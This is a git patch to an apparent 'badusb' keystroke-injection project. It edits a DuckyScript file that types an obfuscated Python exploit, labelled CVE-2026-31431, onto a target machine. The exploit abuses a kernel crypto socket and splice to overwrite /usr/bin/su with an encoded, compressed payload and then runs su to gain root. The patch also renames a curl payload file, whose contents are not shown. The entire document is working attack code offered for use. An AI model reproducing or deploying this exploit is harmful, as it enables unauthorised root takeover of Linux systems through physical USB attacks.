From 999822fdad41bdbf1e5e33e7a4e55047fa1001ee Mon Sep 17 00:00:00 2001
From: Jon <git@jonstarkey.co.uk>
Date: Sat, 2 May 2026 00:06:00 +0100
Subject: [PATCH] Added payloads seperate to cve exploit 'chain'

---
 badusb/CVE-2026-31431-typed.txt          | 10 ++++++++++
 badusb/{payload.txt => payload-curl.txt} |  0
 2 files changed, 10 insertions(+)
 rename badusb/{payload.txt => payload-curl.txt} (100%)

diff --git a/badusb/CVE-2026-31431-typed.txt b/badusb/CVE-2026-31431-typed.txt
index 90357f0..0f2fc96 100644
--- a/badusb/CVE-2026-31431-typed.txt
+++ b/badusb/CVE-2026-31431-typed.txt
@@ -28,16 +28,26 @@ STRING cat > /tmp/cve.py << EOF
 ENTER
 
 STRING #!/usr/bin/env python3
+ENTER
 STRING import os as g,zlib,socket as s
+ENTER
 STRING def d(x):return bytes.fromhex(x)
+ENTER
 STRING def c(f,t,c):
+ENTER
 STRING  a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
+ENTER
 STRING  try:u.recv(8+t)
+ENTER
 STRING  except:0
+ENTER
 STRING f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
+ENTER
 STRING while i<len(e):c(f,i,e[i:i+4]);i+=4
+ENTER
 STRING g.system("su")
 ENTER
+ENTER
 STRING EOF
 ENTER
 
diff --git a/badusb/payload.txt b/badusb/payload-curl.txt
similarity index 100%
rename from badusb/payload.txt
rename to badusb/payload-curl.txt